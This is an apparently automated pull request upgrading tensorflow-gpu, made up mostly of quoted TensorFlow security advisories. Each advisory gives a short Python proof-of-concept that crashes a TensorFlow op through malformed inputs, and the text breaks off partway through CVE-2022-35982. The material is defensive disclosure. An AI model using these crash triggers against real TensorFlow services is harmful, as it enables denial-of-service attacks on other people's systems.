chore(deps): update dependency tensorflow-gpu to v2 [security]

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
tensorflow-gpu	`==1.14.0` -> `==2.7.2`

GitHub Vulnerability Alerts

CVE-2022-36005

Impact

When tf.quantization.fake_quant_with_min_max_vars_gradient receives input min or max that is nonscalar, it gives a CHECK fail that can trigger a denial of service attack.

import tensorflow as tf
import numpy as np 
arg_0=tf.constant(value=np.random.random(size=(2, 2)), shape=(2, 2), dtype=tf.float32)
arg_1=tf.constant(value=np.random.random(size=(2, 2)), shape=(2, 2), dtype=tf.float32)
arg_2=tf.constant(value=np.random.random(size=(2, 2)), shape=(2, 2), dtype=tf.float32)
arg_3=tf.constant(value=np.random.random(size=(2, 2)), shape=(2, 2), dtype=tf.float32)
arg_4=8
arg_5=False
arg_6=''
tf.quantization.fake_quant_with_min_max_vars_gradient(gradients=arg_0, inputs=arg_1,
min=arg_2, max=arg_3, num_bits=arg_4, narrow_range=arg_5, name=arg_6)

Patches

We have patched the issue in GitHub commit f3cf67ac5705f4f04721d15e485e192bb319feed.

The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by

刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology
Neophytos Christou, Secure Systems Labs, Brown University

CVE-2022-36003

Impact

When RandomPoissonV2 receives large input shape and rates, it gives a CHECK fail that can trigger a denial of service attack.

import tensorflow as tf
arg_0=tf.random.uniform(shape=(4,), dtype=tf.int32, maxval=65536)
arg_1=tf.random.uniform(shape=(4, 4, 4, 4, 4), dtype=tf.float32, maxval=None)
arg_2=0
arg_3=0
arg_4=tf.int32
arg_5=None
tf.raw_ops.RandomPoissonV2(shape=arg_0, rate=arg_1, seed=arg_2,
                           seed2=arg_3, dtype=arg_4, name=arg_5)

Patches

We have patched the issue in GitHub commit 552bfced6ce4809db5f3ca305f60ff80dd40c5a3.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology.

CVE-2022-36017

Impact

If Requantize is given input_min, input_max, requested_output_min, requested_output_max tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack.

import tensorflow as tf

out_type = tf.quint8
input = tf.constant([1], shape=[3], dtype=tf.qint32)
input_min = tf.constant([], shape=[0], dtype=tf.float32)
input_max = tf.constant(-256, shape=[1], dtype=tf.float32)
requested_output_min = tf.constant(-256, shape=[1], dtype=tf.float32)
requested_output_max = tf.constant(-256, shape=[1], dtype=tf.float32)
tf.raw_ops.Requantize(input=input, input_min=input_min, input_max=input_max, requested_output_min=requested_output_min, requested_output_max=requested_output_max, out_type=out_type)

Patches

We have patched the issue in GitHub commit 785d67a78a1d533759fcd2f5e8d6ef778de849e0.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.

CVE-2022-36011

Impact

When mlir::tfg::ConvertGenericFunctionToFunctionDef is given empty function attributes, it gives a null dereference.

// Import the function attributes with a `tf.` prefix to match the current
// infrastructure expectations.
for (const auto& namedAttr : func.attr()) {
  const std::string& name = "tf." + namedAttr.first;
  const AttrValue& tf_attr = namedAttr.second;
  TF_ASSIGN_OR_RETURN(Attribute attr,
                      ConvertAttributeValue(tf_attr, builder, tfgDialect));
  attrs.append(name, attr);
}

If namedAttr.first is empty, it will crash.

Patches

We have patched the issue in GitHub commit 1cf45b831eeb0cab8655c9c7c5d06ec6f45fc41b.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

CVE-2022-36013

Impact

When mlir::tfg::GraphDefImporter::ConvertNodeDef tries to convert NodeDefs without an op name, it crashes.

Status GraphDefImporter::ConvertNodeDef(OpBuilder &builder, ConversionState &s,
                                        const NodeDef &node) {
  VLOG(4) << "Importing: " << node.name();
  OperationState state(ConvertLocation(node), absl::StrCat("tfg.", node.op()));

  // The GraphImporter does light shape inference, but here we will defer all of
  // that to the shape inference pass.
  const OpDef *op_def;
  const OpRegistrationData *op_reg_data = nullptr;
  if ((op_reg_data = registry_.LookUp(node.op()))) {
    op_def = &op_reg_data->op_def;
  } else {
    auto it = function_op_defs_.find(node.op());
    if (it == function_op_defs_.end())
      return InvalidArgument("Unable to find OpDef for ", node.op());
    op_def = it->second;
  }

node.op().empty() cannot be empty.

Patches

We have patched the issue in GitHub commit a0f0b9a21c9270930457095092f558fbad4c03e5.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

CVE-2022-36002

Impact

When Unbatch receives a nonscalar input id, it gives a CHECK fail that can trigger a denial of service attack.

import tensorflow as tf
import numpy as np
arg_0=tf.constant(value=np.random.random(size=(3, 3, 1)), dtype=tf.float64)
arg_1=tf.constant(value=np.random.randint(0,100,size=(3, 3, 1)), dtype=tf.int64)
arg_2=tf.constant(value=np.random.randint(0,100,size=(3, 3,  1)), dtype=tf.int64)
arg_3=47
arg_4=''
arg_5=''
tf.raw_ops.Unbatch(batched_tensor=arg_0, batch_index=arg_1, id=arg_2, 
                   timeout_micros=arg_3, container=arg_4, shared_name=arg_5)

Patches

We have patched the issue in GitHub commit 4419d10d576adefa36b0e0a9425d2569f7c0189f.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology.

CVE-2022-36001

Impact

When DrawBoundingBoxes receives an input boxes that is not of dtype float, it gives a CHECK fail that can trigger a denial of service attack.

import tensorflow as tf
import numpy as np
arg_0=tf.constant(value=np.random.random(size=(1, 3, 2, 3)), shape=(1, 3, 2, 3), dtype=tf.half)
arg_1=tf.constant(value=np.random.random(size=(1, 2, 4)), shape=(1, 2, 4), dtype=tf.float32)
arg_2=''
tf.raw_ops.DrawBoundingBoxes(images=arg_0, boxes=arg_1, name=arg_2)

Patches

We have patched the issue in GitHub commit da0d65cdc1270038e72157ba35bf74b85d9bda11.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology.

CVE-2022-36000

Impact

Eig can be fed an incorrect Tout input, resulting in a CHECK fail that can trigger a denial of service attack.

import tensorflow as tf
import numpy as np 
arg_0=tf.constant(value=np.random.random(size=(2, 2)), shape=(2, 2), dtype=tf.float32)
arg_1=tf.complex128
arg_2=True
arg_3=''
tf.raw_ops.Eig(input=arg_0, Tout=arg_1, compute_v=arg_2, name=arg_3)

Patches

We have patched the issue in GitHub commit aed36912609fc07229b4d0a7b44f3f48efc00fd0.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology.

CVE-2022-35959

Impact

The implementation of AvgPool3DGradOp does not fully validate the input orig_input_shape. This results in an overflow that results in a CHECK failure which can be used to trigger a denial of service attack:

import tensorflow as tf

ksize = [1, 1, 1, 1, 1]
strides = [1, 1, 1, 1, 1]
padding = "SAME"
data_format = "NDHWC"
orig_input_shape = tf.constant(1879048192, shape=[5], dtype=tf.int32)
grad = tf.constant(1, shape=[1,3,2,4,2], dtype=tf.float32)
tf.raw_ops.AvgPool3DGrad(orig_input_shape=orig_input_shape, grad=grad, ksize=ksize, strides=strides, padding=padding, data_format=data_format)

Patches

We have patched the issue in GitHub commit 9178ac9d6389bdc54638ab913ea0e419234d14eb.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.

CVE-2022-35996

Impact

If Conv2D is given empty input and the filter and padding sizes are valid, the output is all-zeros. This causes division-by-zero floating point exceptions that can be used to trigger a denial of service attack.

import tensorflow as tf
import numpy as np
with tf.device("CPU"): # also can be triggerred on GPU
   input = np.ones([1, 0, 2, 1])
   filter = np.ones([1, 1, 1, 1])
   strides = ([1, 1, 1, 1])
   padding = "EXPLICIT"
   explicit_paddings = [0 , 0, 1, 1, 1, 1, 0, 0]
   data_format = "NHWC"
   res = tf.raw_ops.Conv2D(
       input=input,
       filter=filter,
       strides=strides,
       padding=padding,
        explicit_paddings=explicit_paddings,
       data_format=data_format,
  )

Patches

We have patched the issue in GitHub commit 611d80db29dd7b0cfb755772c69d60ae5bca05f9.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Jingyi Shi.

CVE-2022-35960

Impact

In core/kernels/list_kernels.cc's TensorListReserve, num_elements is assumed to be a tensor of size 1. When a num_elements of more than 1 element is provided, then tf.raw_ops.TensorListReserve fails the CHECK_EQ in CheckIsAlignedAndSingleElement.

import tensorflow as tf

tf.raw_ops.TensorListReserve(element_shape=(1,1), num_elements=tf.constant([1,1], dtype=tf.int32), element_dtype=tf.int8)

Patches

We have patched the issue in GitHub commit b5f6fbfba76576202b72119897561e3bd4f179c7.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Kang Hong Jin from Singapore Management University.

CVE-2022-35994

Impact

When CollectiveGather receives an scalar input input, it gives a CHECK fails that can be used to trigger a denial of service attack.

import tensorflow as tf
arg_0=1
arg_1=1
arg_2=1
arg_3=1
arg_4=(3, 3,3)
arg_5='auto'
arg_6=0
arg_7=''
tf.raw_ops.CollectiveGather(input=arg_0, group_size=arg_1, group_key=arg_2,
                            instance_key=arg_3, shape=arg_4,
                            communication_hint=arg_5, timeout_seconds=arg_6, name=arg_7)

Patches

We have patched the issue in GitHub commit c1f491817dec39a26be3c574e86a88c30f3c4770.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology.

CVE-2022-35940

Impact

The RaggedRangOp function takes an argument limits that is eventually used to construct a TensorShape as an int64. If limits is a very large float, it can overflow when converted to an int64. This triggers an InvalidArgument but also throws an abort signal that crashes the program.

import tensorflow as tf
tf.raw_ops.RaggedRange(starts=[1.1,0.1],limits=[10.0,1e20],deltas=[1,1])

Patches

We have patched the issue in GitHub commit 37cefa91bee4eace55715eeef43720b958a01192.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Jingyi Shi.

CVE-2022-35952

Impact

The UnbatchGradOp function takes an argument id that is assumed to be a scalar. A nonscalar id can trigger a CHECK failure and crash the program.

import numpy as np
import tensorflow as tf

# `id` is not scalar
tf.raw_ops.UnbatchGrad(original_input= tf.constant([1]),batch_index=tf.constant([[0,0,0 ], ], dtype=tf.int64),grad=tf.constant([1,]),id=tf.constant([1,1,], dtype=tf.int64))

It also requires its argument batch_index to contain three times the number of elements as indicated in its batch_index.dim_size(0). An incorrect batch_index can trigger a CHECK failure and crash the program.

import numpy as np
import tensorflow as tf

# batch_index's size is not 3
tf.raw_ops.UnbatchGrad(original_input= tf.constant([1]),batch_index=tf.constant([[0,0], ], dtype=tf.int64),grad=tf.constant([1,]),id=tf.constant([1,], dtype=tf.int64))

Patches

We have patched the issue in GitHub commit 5f945fc6409a3c1e90d6970c9292f805f6e6ddf2.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Kang Hong Jin from Singapore Management University and 刘力源 from the Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology

CVE-2022-35963

Impact

The implementation of FractionalAvgPoolGrad does not fully validate the input orig_input_tensor_shape. This results in an overflow that results in a CHECK failure which can be used to trigger a denial of service attack.

import tensorflow as tf

overlapping = True
orig_input_tensor_shape = tf.constant(-1879048192, shape=[4], dtype=tf.int64)
out_backprop = tf.constant([], shape=[0,0,0,0], dtype=tf.float64)
row_pooling_sequence = tf.constant(1, shape=[4], dtype=tf.int64)
col_pooling_sequence = tf.constant(1, shape=[4], dtype=tf.int64)
tf.raw_ops.FractionalAvgPoolGrad(orig_input_tensor_shape=orig_input_tensor_shape, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=overlapping)

Patches

We have patched the issue in GitHub commit 03a659d7be9a1154fdf5eeac221e5950fec07dad.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.

CVE-2022-35964

Impact

The implementation of BlockLSTMGradV2 does not fully validate its inputs.

wci, wcf, wco, b must be rank 1
w, cs_prev,h_prev` must be rank 2
x must be rank 3 This results in a a segfault that can be used to trigger a denial of service attack.
```
import tensorflow as tf
```

use_peephole = False seq_len_max = tf.constant(1, shape=[], dtype=tf.int64) x = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32) cs_prev = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32) h_prev = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32) w = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32) wci = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32) wcf = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32) wco = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32) b = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32) i = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32) cs = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32) f = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32) o = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32) ci = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32) co = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32) h = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32) cs_grad = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32) h_grad = tf.constant(0.504355371, shape=[1,1,1], dtype=tf.float32) tf.raw_ops.BlockLSTMGradV2(seq_len_max=seq_len_max, x=x, cs_prev=cs_prev, h_prev=h_prev, w=w, wci=wci, wcf=wcf, wco=wco, b=b, i=i, cs=cs, f=f, o=o, ci=ci, co=co, h=h, cs_grad=cs_grad, h_grad=h_grad, use_peephole=use_peephole)


### Patches
We have patched the issue in GitHub commit [2a458fc4866505be27c62f81474ecb2b870498fa](https://togithub.com/tensorflow/tensorflow/commit/2a458fc4866505be27c62f81474ecb2b870498fa).

The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.

### For more information
Please consult [our security guide](https://togithub.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.

### Attribution
This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.

#### [CVE-2022-35993](https://togithub.com/tensorflow/tensorflow/security/advisories/GHSA-wq6q-6m32-9rv9)

### Impact
When `SetSize` receives an input `set_shape` that is not a 1D tensor, it gives a `CHECK` fails that can be used to trigger a denial of service attack.
```python
import tensorflow as tf
arg_0=1
arg_1=[1,1]
arg_2=1
arg_3=True
arg_4=''
tf.raw_ops.SetSize(set_indices=arg_0, set_values=arg_1, set_shape=arg_2,
                   validate_indices=arg_3, name=arg_4)

Patches

We have patched the issue in GitHub commit cf70b79d2662c0d3c6af74583641e345fc939467.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology.

CVE-2022-35992

Impact

When TensorListFromTensor receives an element_shape of a rank greater than one, it gives a CHECK fail that can trigger a denial of service attack.

import tensorflow as tf
arg_0=tf.random.uniform(shape=(6, 6, 2), dtype=tf.bfloat16, maxval=None)
arg_1=tf.random.uniform(shape=(6, 9, 1, 3), dtype=tf.int64, maxval=65536)
arg_2=''
tf.raw_ops.TensorListFromTensor(tensor=arg_0, element_shape=arg_1, name=arg_2)

Patches

We have patched the issue in GitHub commit 3db59a042a38f4338aa207922fa2f476e000a6ee.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology.

CVE-2022-35965

Impact

If LowerBound or UpperBound is given an emptysorted_inputs input, it results in a nullptr dereference, leading to a segfault that can be used to trigger a denial of service attack.

import tensorflow as tf

out_type = tf.int32
sorted_inputs = tf.constant([], shape=[10,0], dtype=tf.float32)
values = tf.constant([], shape=[10,10,0,10,0], dtype=tf.float32)
tf.raw_ops.LowerBound(sorted_inputs=sorted_inputs, values=values, out_type=out_type)

import tensorflow as tf

out_type = tf.int64
sorted_inputs = tf.constant([], shape=[2,2,0,0,0,0,0,2], dtype=tf.float32)
values = tf.constant(0.372660398, shape=[2,4], dtype=tf.float32)
tf.raw_ops.UpperBound(sorted_inputs=sorted_inputs, values=values, out_type=out_type)

Patches

We have patched the issue in GitHub commit bce3717eaef4f769019fd18e990464ca4a2efeea.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.

CVE-2022-35991

Impact

When TensorListScatter and TensorListScatterV2 receive an element_shape of a rank greater than one, they give a CHECK fail that can trigger a denial of service attack.

import tensorflow as tf
arg_0=tf.random.uniform(shape=(2, 2, 2), dtype=tf.float16, maxval=None)
arg_1=tf.random.uniform(shape=(2, 2, 2), dtype=tf.int32, maxval=65536)
arg_2=tf.random.uniform(shape=(2, 2, 2), dtype=tf.int32, maxval=65536)
arg_3=''
tf.raw_ops.TensorListScatter(tensor=arg_0, indices=arg_1, 
element_shape=arg_2, name=arg_3)

Patches

We have patched the issue in GitHub commit bb03fdf4aae944ab2e4b35c7daa051068a8b7f61.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology.

CVE-2022-35990

Impact

When tf.quantization.fake_quant_with_min_max_vars_per_channel_gradient receives input min or max of rank other than 1, it gives a CHECK fail that can trigger a denial of service attack.

import tensorflow as tf
arg_0=tf.random.uniform(shape=(1,1), dtype=tf.float32, maxval=None)
arg_1=tf.random.uniform(shape=(1,1), dtype=tf.float32, maxval=None)
arg_2=tf.random.uniform(shape=(1,1), dtype=tf.float32, maxval=None)
arg_3=tf.random.uniform(shape=(1,1), dtype=tf.float32, maxval=None)
arg_4=8
arg_5=False
arg_6=None
tf.quantization.fake_quant_with_min_max_vars_per_channel_gradient(gradients=arg_0, 
            inputs=arg_1, min=arg_2,  max=arg_3, num_bits=arg_4, 
            narrow_range=arg_5, name=arg_6)

Patches

We have patched the issue in GitHub commit f3cf67ac5705f4f04721d15e485e192bb319feed.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by

刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology
Neophytos Christou, Secure Systems Labs, Brown University

CVE-2022-35966

Impact

If QuantizedAvgPool is given min_input or max_input tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack.

import tensorflow as tf

ksize = [1, 2, 2, 1]
strides = [1, 2, 2, 1]
padding = "SAME"
input = tf.constant(1, shape=[1,4,4,2], dtype=tf.quint8)
min_input = tf.constant([], shape=[0], dtype=tf.float32)
max_input = tf.constant(0, shape=[1], dtype=tf.float32)
tf.raw_ops.QuantizedAvgPool(input=input, min_input=min_input, max_input=max_input, ksize=ksize, strides=strides, padding=padding)

Patches

We have patched the issue in GitHub commit 7cdf9d4d2083b739ec81cfdace546b0c99f50622.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.

CVE-2022-35967

Impact

If QuantizedAdd is given min_input or max_input tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack.

import tensorflow as tf

Toutput = tf.qint32
x = tf.constant(140, shape=[1], dtype=tf.quint8)
y = tf.constant(26, shape=[10], dtype=tf.quint8)
min_x = tf.constant([], shape=[0], dtype=tf.float32)
max_x = tf.constant(0, shape=[], dtype=tf.float32)
min_y = tf.constant(0, shape=[], dtype=tf.float32)
max_y = tf.constant(0, shape=[], dtype=tf.float32)
tf.raw_ops.QuantizedAdd(x=x, y=y, min_x=min_x, max_x=max_x, min_y=min_y, max_y=max_y, Toutput=Toutput)

Patches

We have patched the issue in GitHub commit 49b3824d83af706df0ad07e4e677d88659756d89.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.

CVE-2022-35968

Impact

The implementation of AvgPoolGrad does not fully validate the input orig_input_shape. This results in a CHECK failure which can be used to trigger a denial of service attack:

import tensorflow as tf

ksize = [1, 2, 2, 1]
strides = [1, 2, 2, 1]
padding = "VALID"
data_format = "NHWC"
orig_input_shape = tf.constant(-536870912, shape=[4], dtype=tf.int32)
grad = tf.constant(.0890338004362538, shape=[1,5,7,1], dtype=tf.float64)
tf.raw_ops.AvgPoolGrad(orig_input_shape=orig_input_shape, grad=grad, ksize=ksize, strides=strides, padding=padding, data_format=data_format)

Patches

We have patched the issue in GitHub commit 3a6ac52664c6c095aa2b114e742b0aa17fdce78f.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.

CVE-2022-35969

Impact

The implementation of Conv2DBackpropInput requires input_sizes to be 4-dimensional. Otherwise, it gives a CHECK failure which can be used to trigger a denial of service attack:

import tensorflow as tf

strides = [1, 1, 1, 1]
padding = "SAME"
use_cudnn_on_gpu = True
explicit_paddings = []
data_format = "NHWC"
dilations = [1, 1, 1, 1]
input_sizes = tf.constant([65534,65534], shape=[2], dtype=tf.int32)
filter = tf.constant(0.159749106, shape=[3,3,2,2], dtype=tf.float32)
out_backprop = tf.constant(0, shape=[], dtype=tf.float32)
tf.raw_ops.Conv2DBackpropInput(input_sizes=input_sizes, filter=filter, out_backprop=out_backprop, strides=strides, padding=padding, use_cudnn_on_gpu=use_cudnn_on_gpu, explicit_paddings=explicit_paddings, data_format=data_format, dilations=dilations)

Patches

We have patched the issue in GitHub commit 50156d547b9a1da0144d7babe665cf690305b33c.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.

CVE-2022-35970

Impact

If QuantizedInstanceNorm is given x_min or x_max tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack.

import tensorflow as tf

output_range_given = False
given_y_min = 0
given_y_max = 0
variance_epsilon = 1e-05
min_separation = 0.001
x = tf.constant(88, shape=[1,4,4,32], dtype=tf.quint8)
x_min = tf.constant([], shape=[0], dtype=tf.float32)
x_max = tf.constant(0, shape=[], dtype=tf.float32)
tf.raw_ops.QuantizedInstanceNorm(x=x, x_min=x_min, x_max=x_max, output_range_given=output_range_given, given_y_min=given_y_min, given_y_max=given_y_max, variance_epsilon=variance_epsilon, min_separation=min_separation)

Patches

We have patched the issue in GitHub commit 785d67a78a1d533759fcd2f5e8d6ef778de849e0.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.

CVE-2022-35971

Impact

If FakeQuantWithMinMaxVars is given min or max tensors of a nonzero rank, it results in a CHECK fail that can be used to trigger a denial of service attack.

import tensorflow as tf

num_bits = 8
narrow_range = False
inputs = tf.constant(0, shape=[2,3], dtype=tf.float32)
min = tf.constant(0, shape=[2,3], dtype=tf.float32)
max = tf.constant(0, shape=[2,3], dtype=tf.float32)
tf.raw_ops.FakeQuantWithMinMaxVars(inputs=inputs, min=min, max=max, num_bits=num_bits, narrow_range=narrow_range)

Patches

We have patched the issue in GitHub commit 785d67a78a1d533759fcd2f5e8d6ef778de849e0.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by:

Neophytos Christou, Secure Systems Labs, Brown University.
刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology

CVE-2022-35972

Impact

If QuantizedBiasAdd is given min_input, max_input, min_bias, max_bias tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack.

import tensorflow as tf

out_type = tf.qint32
input = tf.constant([85,170,255], shape=[3], dtype=tf.quint8)
bias = tf.constant(43, shape=[2,3], dtype=tf.quint8)
min_input = tf.constant([], shape=[0], dtype=tf.float32)
max_input = tf.constant(0, shape=[1], dtype=tf.float32)
min_bias = tf.constant(0, shape=[1], dtype=tf.float32)
max_bias = tf.constant(0, shape=[1], dtype=tf.float32)
tf.raw_ops.QuantizedBiasAdd(input=input, bias=bias, min_input=min_input, max_input=max_input, min_bias=min_bias, max_bias=max_bias, out_type=out_type)

Patches

We have patched the issue in GitHub commit 785d67a78a1d533759fcd2f5e8d6ef778de849e0.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.

CVE-2022-35973

Impact

If QuantizedMatMul is given nonscalar input for:

min_a
max_a
min_b
max_b It gives a segfault that can be used to trigger a denial of service attack.
```
import tensorflow as tf
```

Toutput = tf.qint32 transpose_a = False transpose_b = False Tactivation = tf.quint8 a = tf.constant(7, shape=[3,4], dtype=tf.quint8) b = tf.constant(1, shape=[2,3], dtype=tf.quint8) min_a = tf.constant([], shape=[0], dtype=tf.float32) max_a = tf.constant(0, shape=[1], dtype=tf.float32) min_b = tf.constant(0, shape=[1], dtype=tf.float32) max_b = tf.constant(0, shape=[1], dtype=tf.float32) tf.raw_ops.QuantizedMatMul(a=a, b=b, min_a=min_a, max_a=max_a, min_b=min_b, max_b=max_b, Toutput=Toutput, transpose_a=transpose_a, transpose_b=transpose_b, Tactivation=Tactivation)


### Patches
We have patched the issue in GitHub commit [aca766ac7693bf29ed0df55ad6bfcc78f35e7f48](https://togithub.com/tensorflow/tensorflow/commit/aca766ac7693bf29ed0df55ad6bfcc78f35e7f48).

The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.

### For more information
Please consult [our security guide](https://togithub.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.

### Attribution
This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.

#### [CVE-2022-35974](https://togithub.com/tensorflow/tensorflow/security/advisories/GHSA-vgvh-2pf4-jr2x)

### Impact
If `QuantizeDownAndShrinkRange` is given nonscalar inputs for `input_min` or `input_max`, it results in a segfault that can be used to trigger a denial of service attack.
```python
import tensorflow as tf

out_type = tf.quint8
input = tf.constant([1], shape=[3], dtype=tf.qint32)
input_min = tf.constant([], shape=[0], dtype=tf.float32)
input_max = tf.constant(-256, shape=[1], dtype=tf.float32)
tf.raw_ops.QuantizeDownAndShrinkRange(input=input, input_min=input_min, input_max=input_max, out_type=out_type)

Patches

We have patched the issue in GitHub commit 73ad1815ebcfeb7c051f9c2f7ab5024380ca8613.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.

CVE-2022-35979

Impact

If QuantizedRelu or QuantizedRelu6 are given nonscalar inputs for min_features or max_features, it results in a segfault that can be used to trigger a denial of service attack.

import tensorflow as tf

out_type = tf.quint8
features = tf.constant(28, shape=[4,2], dtype=tf.quint8)
min_features = tf.constant([], shape=[0], dtype=tf.float32)
max_features = tf.constant(-128, shape=[1], dtype=tf.float32)
tf.raw_ops.QuantizedRelu(features=features, min_features=min_features, max_features=max_features, out_type=out_type)
tf.raw_ops.QuantizedRelu6(features=features, min_features=min_features, max_features=max_features, out_type=out_type)

Patches

We have patched the issue in GitHub commit 49b3824d83af706df0ad07e4e677d88659756d89.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.

CVE-2022-35981

Impact

FractionalMaxPoolGrad validates its inputs with CHECK failures instead of with returning errors. If it gets incorrectly sized inputs, the CHECK failure can be used to trigger a denial of service attack:

import tensorflow as tf

overlapping = True
orig_input = tf.constant(.453409232, shape=[1,7,13,1], dtype=tf.float32)
orig_output = tf.constant(.453409232, shape=[1,7,13,1], dtype=tf.float32)
out_backprop = tf.constant(.453409232, shape=[1,7,13,1], dtype=tf.float32)
row_pooling_sequence = tf.constant(0, shape=[5], dtype=tf.int64)
col_pooling_sequence = tf.constant(0, shape=[5], dtype=tf.int64)
tf.raw_ops.FractionalMaxPoolGrad(orig_input=orig_input, orig_output=orig_output, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=overlapping)

Patches

We have patched the issue in GitHub commit 8741e57d163a079db05a7107a7609af70931def4.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.

CVE-2022-35982

Impact

If SparseBincount is given inputs for indices, values, and dense_shape that do not make a valid sparse tensor, it results in a segfault that can be used to trigger a denial of service attack.

import tensorflow as tf
binary_output = True
